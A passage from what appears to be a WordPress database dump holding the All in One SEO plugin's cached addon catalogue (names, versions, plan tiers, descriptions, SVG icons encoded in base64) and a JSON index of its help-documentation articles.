44OTUuNjMyLjc3LjU4OC43NTggMS40NDgtLjAyMiAyLjAxNC0uMjg3LjIwNy0uNTc0LjQxNC0uODYxLjYxLS4zMjIuMjE4LS40MTMuNTEyLS4yOTkuODZhNy44NyA3Ljg3IDAgMCAwIDEuNzQ1IDIuODg3Yy4yNC4yNS41MTYuMzE2Ljg1LjE4NS4zOS0uMTUzLjc2OC0uMzI3IDEuMTU4LS40NjguNzU4LS4yNzMgMS41MTUuMTIgMS42NzYuODcuMDguNDA0LjEyNi44MTguMTYgMS4yMi4wMzUuMzcuMjQxLjU2Ny41OTcuNjQzIDEuMTYuMjQgMi4zMDcuMjQgMy40NjYuMDExLjQxMy0uMDg3LjYwOC0uMzE2LjY0My0uNzA4LjAyMy0uMzI3LjA2OS0uNjUzLjEwMy0uOTcuMTE1LS45MjUuODk1LTEuMzgyIDEuODE0LTEuMDQ1LjM0NC4xMzEuNjg4LjI3MyAxLjAzMi40MjUuMzY4LjE1My42NjYuMDc2LjkxOC0uMjA3YTguNDk0IDguNDk0IDAgMCAwIDEuNzEtMi44MmMuMTUtLjMzOC4wNTgtLjYyMS0uMjc1LS44NXptLTkuNDguNjk3Yy0uMTAzLjEzLS4zMS4xMi0uNDEzLS4wMUw2LjAzIDEwLjE3M2EuMjIuMjIgMCAwIDEgMC0uMjgzbDEuOTI4LTIuNDI5IDEuNDY5IDEuNzItLjYzMS44NS41MjcuNzA4YS4yMDUuMjA1IDAgMCAxLS4wMTEuMjYyem01LjgzLTIuMTc4LTIuNDc5IDMuMDE3YS4yNi4yNiAwIDAgMS0uMjA2LjEwOUg5LjEwNWEuMjUuMjUgMCAwIDEtLjIwNi0uNDAzbDIuMzUzLTIuODY1LTIuNjc0LTMuMjY3aDIuODY5bDIuNTU5IDMuMTI2YS4yMzYuMjM2IDAgMCAxLS4wMTEuMjgzeiIvPjwvc3ZnPg==\";s:6:\"levels\";a:6:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:5:\"basic\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";i:5;s:5:\"elite\";}s:13:\"currentLevels\";a:4:{i:0;s:5:\"basic\";i:1;s:4:\"plus\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:193:\"<p>Add IndexNow support to instantly notify search engines when your content has changed. This helps the search engines to prioritize the changes on your website and helps you rank faster.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:28:\"https://aioseo.com/index-now\";s:12:\"learnMoreUrl\";s:28:\"https://aioseo.com/index-now\";s:9:\"manageUrl\";s:45:\"https://route#aioseo-settings:webmaster-tools\";s:8:\"features\";a:0:{}}i:6;O:8:\"stdClass\":15:{s:3:\"sku\";s:15:\"aioseo-rest-api\";s:4:\"name\";s:8:\"REST API\";s:7:\"version\";s:5:\"1.0.9\";s:5:\"image\";N;s:4:\"icon\";s:280:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgY2xhc3M9ImFpb3Nlby1jb2RlIj48cGF0aCBkPSJNOS40IDE2LjZMNC44IDEybDQuNi00LjZMOCA2bC02IDYgNiA2IDEuNC0xLjR6bTUuMiAwbDQuNi00LjYtNC42LTQuNkwxNiA2bDYgNi02IDYtMS40LTEuNHoiIGZpbGw9ImN1cnJlbnRDb2xvciIvPjwvc3ZnPg==\";s:6:\"levels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:137:\"<p>Manage your post and term SEO meta via the WordPress REST API. This addon also works seamlessly with headless WordPress installs.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:36:\"https://aioseo.com/feature/rest-api/\";s:12:\"learnMoreUrl\";s:36:\"https://aioseo.com/feature/rest-api/\";s:9:\"manageUrl\";s:0:\"\";s:8:\"features\";a:0:{}}i:7;O:8:\"stdClass\":15:{s:3:\"sku\";s:16:\"aioseo-image-seo\";s:4:\"name\";s:9:\"Image SEO\";s:7:\"version\";s:5:\"1.2.5\";s:5:\"image\";N;s:4:\"icon\";s:436:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMCAyMCI+PHBhdGggZD0iTTE1LjgzMyA0LjE2N3YxMS42NjZINC4xNjdWNC4xNjdoMTEuNjY2Wm0wLTEuNjY3SDQuMTY3QzMuMjUgMi41IDIuNSAzLjI1IDIuNSA0LjE2N3YxMS42NjZjMCAuOTE3Ljc1IDEuNjY3IDEuNjY3IDEuNjY3aDExLjY2NmMuOTE3IDAgMS42NjctLjc1IDEuNjY3LTEuNjY3VjQuMTY3YzAtLjkxNy0uNzUtMS42NjctMS42NjctMS42NjdabS00LjA1IDcuMzgzLTIuNSAzLjIyNUw3LjUgMTAuOTUgNSAxNC4xNjdoMTBsLTMuMjE3LTQuMjg0WiIvPjwvc3ZnPg==\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:161:\"<p>Globally control the Title, Alt Text, Caption and Descriptions for images in your content. These attributes are essential for both accessibility and SEO.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:12:\"learnMoreUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:9:\"manageUrl\";s:44:\"https://route#aioseo-search-appearance:media\";s:8:\"features\";a:0:{}}i:8;O:8:\"stdClass\":15:{s:3:\"sku\";s:11:\"aioseo-eeat\";s:4:\"name\";s:20:\"Author SEO (E-E-A-T)\";s:7:\"version\";s:6:\"1.2.11\";s:5:\"image\";N;s:4:\"icon\";s:1380:\"PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgLTk2MCA5NjAgOTYwIiB3aWR0aD0iMjQiPjxwYXRoIGQ9Ik00NDAuMTE4LTU2MHEzMy44MzkgMCA1Ny44MTctMjQuMDk3dDIzLjk3OC01Ny45MzVxMC0zMy44MzgtMjMuOTc4LTU3LjY5Ni0yMy45NzgtMjMuODU5LTU3LjgxNy0yMy44NTktMzMuODM4IDAtNTcuOTM0IDIzLjg1OS0yNC4wOTcgMjMuODU4LTI0LjA5NyA1Ny42OTYgMCAzMy44MzggMjQuMDk3IDU3LjkzNVE0MDYuMjgtNTYwIDQ0MC4xMTgtNTYwWk00NDAtMzk2LjQxM3E0NS43MTcgMCA4NS41NzYtMTkuNDc4IDM5Ljg1OS0xOS40NzkgNjkuNTc2LTU2LjE1Mi0zNS45NTYtMjMuNzE4LTc0LjkzNS0zNS44MzdRNDgxLjIzOS01MjAgNDQwLTUyMHQtODAuMjE3IDEyLjEycS0zOC45NzkgMTIuMTE5LTc0LjkzNSAzNS44MzcgMjkuNzE3IDM2LjY3MyA2OS41NzYgNTYuMTUyIDM5Ljg1OSAxOS40NzggODUuNTc2IDE5LjQ3OFptMzg2LjM5MSAyODYuOTM1TDYzNy45MTMtMjk3Ljk1NnEtNDEuNzE3IDMxLjc2MS05MS42OTYgNDkuNDAyUTQ5Ni4yMzktMjMwLjkxMyA0NDAtMjMwLjkxM3EtMTM3LjU4NyAwLTIzMy4zMzctOTUuNzVUMTEwLjkxMy01NjBxMC0xMzcuNTg3IDk1Ljc1LTIzMy4zMzdUNDQwLTg4OS4wODdxMTM3LjU4NyAwIDIzMy4zMzcgOTUuNzVUNzY5LjA4Ny01NjBxMCA1NS43NjEtMTcuNzYxIDEwNS45NzgtMTcuNzYxIDUwLjIxOC00OS41MjEgOTIuMTc0TDg5MC4yODMtMTczLjM3bC02My44OTIgNjMuODkyWk00NDAuMTEzLTMyMS45MTNxOTkuMTU2IDAgMTY4LjU2NS02OS41MjIgNjkuNDA5LTY5LjUyMiA2OS40MDktMTY4LjY3OCAwLTk5LjE1Ni02OS40MDktMTY4LjU2NS02OS40MDktNjkuNDA5LTE2OC41NjUtNjkuNDA5LTk5LjE1NiAwLTE2OC42NzggNjkuNDA5LTY5LjUyMiA2OS40MDktNjkuNTIyIDE2OC41NjUgMCA5OS4xNTYgNjkuNTIyIDE2OC42NzggNjkuNTIyIDY5LjUyMiAxNjguNjc4IDY5LjUyMlpNNDQwLTU2MFoiLz48L3N2Zz4=\";s:6:\"levels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:147:\"<p>Optimize your site for Google\'s E-E-A-T ranking factor by proving your writer\'s expertise through author schema markup and new UI elements.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:33:\"https://aioseo.com/features/eeat/\";s:12:\"learnMoreUrl\";s:33:\"https://aioseo.com/features/eeat/\";s:9:\"manageUrl\";s:49:\"https://route#aioseo-search-appearance:author-seo\";s:8:\"features\";a:0:{}}}','2026-05-21 05:14:40','2026-05-20 05:14:40','2026-05-20 05:14:40'),(417,'admin_help_docs','s:92049:\"{\"categories\":{\"getting-started\":\"Getting Started\",\"installation\":\"Installation\",\"search-appearance\":\"Search Appearance\",\"social-networks\":\"Social Networks\",\"xml-sitemap\":\"XML Sitemap\",\"frequently-asked-questions\":\"Frequently Asked Questions\"},\"docs\":{\"1014225\":{\"title\":\"Does AIOSEO support Right-to-Left (RTL) languages, such as Arabic and Hebrew?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/does-aioseo-support-right-to-left-rtl-languages-such-as-arabic-and-hebrew\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014223\":{\"title\":\"Is there any affiliate program for AIOSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/is-there-any-affiliate-program-for-aioseo\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014220\":{\"title\":\"Where can I find your changelog?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/where-can-i-find-your-changelog\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014217\":{\"title\":\"Where can I download All in One SEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/where-can-i-download-all-in-one-seo\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014213\":{\"title\":\"Which multilingual plugins are compatible with AIOSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/which-multilingual-plugins-are-compatible-with-aioseo\\/\",\"categories\":[]},\"1014211\":{\"title\":\"Is the free version of All in One SEO required for All in One SEO Pro to work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/is-the-free-version-of-all-in-one-seo-required-for-all-in-one-seo-pro-to-work\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014209\":{\"title\":\"Is All in One SEO compliant with GDPR?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/is-all-in-one-seo-compliant-with-gdpr\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014207\":{\"title\":\"Is All in One SEO translation ready?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/is-all-in-one-seo-translation-ready\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014205\":{\"title\":\"Can I use All in One SEO on client sites?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-use-all-in-one-seo-on-client-sites\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014203\":{\"title\":\"Does All in One SEO work on a WordPress.com site?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/does-all-in-one-seo-work-on-a-wordpress-com-site\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014200\":{\"title\":\"Does All in One SEO work on non-WordPress sites?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/does-all-in-one-seo-work-on-non-wordpress-sites\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014198\":{\"title\":\"Will All in One SEO slow down my website?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/will-all-in-one-seo-slow-down-my-website\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014196\":{\"title\":\"Do I need coding skills to use AIOSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-i-need-coding-skills-to-use-aioseo\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014194\":{\"title\":\"What\\u2019s required to use AIOSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/whats-required-to-use-aioseo\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014192\":{\"title\":\"What is the difference between the free version of All in One SEO and All in One SEO Pro?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-the-difference-between-the-free-version-of-all-in-one-seo-and-all-in-one-seo-pro\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014190\":{\"title\":\"Who should use AIOSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/who-should-use-aioseo\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014188\":{\"title\":\"Do you charge tax or VAT?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-you-charge-tax-or-vat\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014185\":{\"title\":\"How is AIOSEO better than other SEO plugins?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-is-aioseo-better-than-other-seo-plugins\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014120\":{\"title\":\"Can I buy a lifetime or monthly license?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-buy-a-lifetime-or-monthly-license\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014118\":{\"title\":\"Can I import my posts and terms metadata, and SEO settings from other SEO plugins?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-import-my-posts-and-terms-metadata-and-seo-settings-from-other-seo-plugins\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014115\":{\"title\":\"Can I purchase a custom plan with specific features and site activations?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-purchase-a-custom-plan-with-specific-features-and-site-activations\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014112\":{\"title\":\"Do you offer special pricing for nonprofits and charities?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-you-offer-special-pricing-for-nonprofits-and-charities\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014110\":{\"title\":\"I have the free version, can I just buy support?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/i-have-the-free-version-can-i-just-buy-support\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014108\":{\"title\":\"Will my data be lost if I convert from the free version to the Pro version?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/will-my-data-be-lost-if-i-convert-from-the-free-version-to-the-pro-version\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014073\":{\"title\":\"What\\u2019s included in my purchase of All in One SEO Pro?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/whats-included-in-my-purchase-of-all-in-one-seo-pro\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014071\":{\"title\":\"Do you offer phone support?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-you-offer-phone-support\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014068\":{\"title\":\"How do I upgrade to All in One SEO Pro?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-upgrade-to-all-in-one-seo-pro\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014064\":{\"title\":\"What payment methods do you accept?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-payment-methods-do-you-accept\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014062\":{\"title\":\"How does your pricing work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-does-your-pricing-work\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014060\":{\"title\":\"How long will I receive support and updates for?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-long-will-i-receive-support-and-updates-for\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014058\":{\"title\":\"Will the plugin work without a license key?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/will-the-plugin-work-without-a-license-key\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014054\":{\"title\":\"Do staging, test, or development sites count towards my licenses?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-staging-test-or-development-sites-count-towards-my-licenses\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014052\":{\"title\":\"How many sites can I install All in One SEO Pro on?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-many-sites-can-i-install-all-in-one-seo-pro-on\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1014048\":{\"title\":\"Is a subscription \\/ license for AIOSEO Pro included with a purchase of AI credits?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/is-a-subscription-license-for-aioseo-pro-included-with-a-purchase-of-ai-credits\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014045\":{\"title\":\"Can I get a refund for my AI credits?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-get-a-refund-for-my-ai-credits\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014041\":{\"title\":\"Do AI credits roll over?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-ai-credits-roll-over\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014039\":{\"title\":\"What happens if I use all my paid credits?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-happens-if-i-use-all-my-paid-credits\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014036\":{\"title\":\"What happens after I use all my free credits?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-happens-after-i-use-all-my-free-credits\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014034\":{\"title\":\"How do I know how many credits I need?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-know-how-many-credits-i-need\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1014029\":{\"title\":\"What are AI credits and who can use these?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-are-ai-credits-and-who-can-use-these\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"1010794\":{\"title\":\"Can I purchase more than one plan?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-purchase-more-than-one-plan\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010789\":{\"title\":\"Can I upgrade \\/ downgrade my subscription?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-upgrade-downgrade-my-subscription\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010787\":{\"title\":\"Can I cancel my account and what happens if I cancel?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-cancel-my-account\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010784\":{\"title\":\"I haven\\u2019t received my receipt or login details\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/i-havent-received-my-receipt-or-login-details\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010779\":{\"title\":\"I can\\u2019t log in to my account\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/i-cant-log-in-to-my-account\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010773\":{\"title\":\"How do I change my payment information?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-change-my-payment-information\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010769\":{\"title\":\"I don\\u2019t see my purchase information in the Account area\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/i-dont-see-my-purchase-information-in-the-account-area\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010764\":{\"title\":\"Can I get an invoice for my payment?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-get-an-invoice-for-my-payment\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010762\":{\"title\":\"What is your policy on refunds?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-your-policy-on-refunds\\/\",\"categories\":[\"frequently-asked-questions\"]},\"1010741\":{\"title\":\"Where can I find my download link and license key?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/where-can-i-find-my-download-link-and-license-key\\/\",\"categories\":[\"frequently-asked-questions\"]},\"985178\":{\"title\":\"Generating Schema Markup Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-schema-markup-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\",\"schema-settings\"]},\"985169\":{\"title\":\"Generating Image Alt Text Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-image-alt-text-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\"]},\"906577\":{\"title\":\"Using the SEO Checklist in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-seo-checklist-in-all-in-one-seo\\/\",\"categories\":[\"general-settings\",\"getting-started\"]},\"852305\":{\"title\":\"AIOSEO LLMS Filters\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo-llms-filters\\/\",\"categories\":[\"filter-hooks\"]},\"827664\":{\"title\":\"Using AI Insights to Research Brand Performance in AI Search\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-ai-insights-to-research-brand-performance-in-ai-search\\/\",\"categories\":[\"ai-insights\"]},\"809448\":{\"title\":\"Setting the HTTP Site and Redirect Headers in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-http-site-and-redirect-headers-in-all-in-one-seo\\/\",\"categories\":[\"redirection-manager\"]},\"775551\":{\"title\":\"Displaying Products on Your Site Using All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-products-on-your-site-using-all-in-one-seo\\/\",\"categories\":[\"content-blocks\"]},\"775433\":{\"title\":\"Displaying Recipes on Your Site Using All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-recipes-on-your-site-using-all-in-one-seo\\/\",\"categories\":[\"content-blocks\"]},\"749464\":{\"title\":\"Do I Need a License Key to Use \\u200bBroken Link Checker\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/do-i-need-a-license-key-to-use-broken-link-checker\\/\",\"categories\":[\"broken-link-checker\",\"frequently-asked-questions\"]},\"749421\":{\"title\":\"Troubleshooting Issues with the AIOSEO Details Not Loading\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-issues-with-the-aioseo-details-not-loading\\/\",\"categories\":[\"troubleshooting\",\"truseo\"]},\"744035\":{\"title\":\"Using the AI Image Generator in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-ai-image-generator-in-all-in-one-seo\\/\",\"categories\":[\"aioseo-ai\",\"content-blocks\"]},\"742832\":{\"title\":\"Using the AI Assistant in All in One SEO to Create Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-ai-assistant-in-all-in-one-seo-to-create-content\\/\",\"categories\":[\"aioseo-ai\",\"content-blocks\"]},\"729979\":{\"title\":\"Understanding and Fixing the Excluded by \'noindex\' Tag Status in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/understanding-and-fixing-the-excluded-by-noindex-tag-status-in-google-search-console\\/\",\"categories\":[\"google-search-console\"]},\"729947\":{\"title\":\"Resolving Indexed, though Blocked by robots.txt in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/resolving-indexed-though-blocked-by-robots-txt-in-google-search-console\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"729819\":{\"title\":\"How to Write High-Quality Reviews That Inform and Influence\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-write-high-quality-reviews-that-inform-and-influence\\/\",\"categories\":[\"general-seo-topics\"]},\"729202\":{\"title\":\"How to Self-Assess Your Content to See If It\\u2019s Helpful, Reliable, and People-First\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-self-assess-your-content-to-see-if-its-helpful-reliable-and-people-first\\/\",\"categories\":[\"general-seo-topics\"]},\"729130\":{\"title\":\"How Does Google Ranking Work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-does-google-ranking-work\\/\",\"categories\":[\"general-seo-topics\"]},\"729050\":{\"title\":\"How to Ensure Google Indexes Your Website for Better Visibility\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-ensure-google-indexes-your-website-for-better-visibility\\/\",\"categories\":[\"general-seo-topics\"]},\"728947\":{\"title\":\"How to Get Search Engines to Help People Discover Your Content?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-get-search-engines-to-help-people-discover-your-content\\/\",\"categories\":[\"general-seo-topics\"]},\"728922\":{\"title\":\"How to Optimize Seasonal Offers with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-optimize-seasonal-offers-with-all-in-one-seo\\/\",\"categories\":[\"general-seo-topics\"]},\"728821\":{\"title\":\"How to Use All in One SEO to Share Your Brand Story with Shoppers\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-use-all-in-one-seo-to-share-your-brand-story-with-shoppers\\/\",\"categories\":[\"general-seo-topics\"]},\"728648\":{\"title\":\"The Importance of Quality Content for SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/the-importance-of-quality-content-for-seo\\/\",\"categories\":[\"general-seo-topics\"]},\"728612\":{\"title\":\"How to Fix the Duplicate Without User-Selected Canonical Error in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-fix-the-duplicate-without-user-selected-canonical-error-in-google-search-console\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"728558\":{\"title\":\"Server Error (5xx) in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/server-error-5xx-in-google-search-console\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"722663\":{\"title\":\"Troubleshooting Duplicate, Google Chose Different Canonical than User errors\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-duplicate-google-chose-different-canonical-than-user-errors\\/\",\"categories\":[\"google-search-console\"]},\"722640\":{\"title\":\"Understanding the Alternate Page with Proper Canonical Tag Status in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/understanding-the-alternate-page-with-proper-canonical-tag-status-in-google-search-console\\/\",\"categories\":[\"google-search-console\"]},\"722612\":{\"title\":\"Understanding the \\\"Page with redirect\\\" Status in Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/understanding-the-page-with-redirect-status-in-google-search-console\\/\",\"categories\":[\"google-search-console\",\"search-statistics\"]},\"690784\":{\"title\":\"How to Perform an SEO Audit of your Site using All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-perform-an-seo-audit-of-your-site-using-all-in-one-seo\\/\",\"categories\":[\"seo-analysis\"]},\"637532\":{\"title\":\"How to Create an LLMS.txt Using All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-an-llms-txt-using-all-in-one-seo\\/\",\"categories\":[\"advanced-settings\",\"aioseo-ai\",\"general-settings\"]},\"636372\":{\"title\":\"Buying and Managing Credits for the AIOSEO AI Features\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/buying-and-managing-credits-for-the-aioseo-ai-features\\/\",\"categories\":[\"aioseo-ai\",\"frequently-asked-questions\"]},\"635474\":{\"title\":\"Generating Key Points Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-key-points-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\",\"content-blocks\",\"post-page-settings\"]},\"635447\":{\"title\":\"Generating FAQs Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-faqs-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\",\"content-blocks\",\"post-page-settings\"]},\"635325\":{\"title\":\"Generating Social Posts Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-social-posts-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\",\"post-page-settings\"]},\"636260\":{\"title\":\"Generating SEO Titles and Meta Descriptions Using AIOSEO AI\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/generating-seo-titles-and-meta-descriptions-using-aioseo-ai\\/\",\"categories\":[\"aioseo-ai\",\"post-page-settings\"]},\"623125\":{\"title\":\"Privately Sharing Login Credentials with our Support team\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/privately-sharing-login-credentials-with-our-support-team\\/\",\"categories\":[\"frequently-asked-questions\",\"troubleshooting\"]},\"601282\":{\"title\":\"Installing All in One SEO via 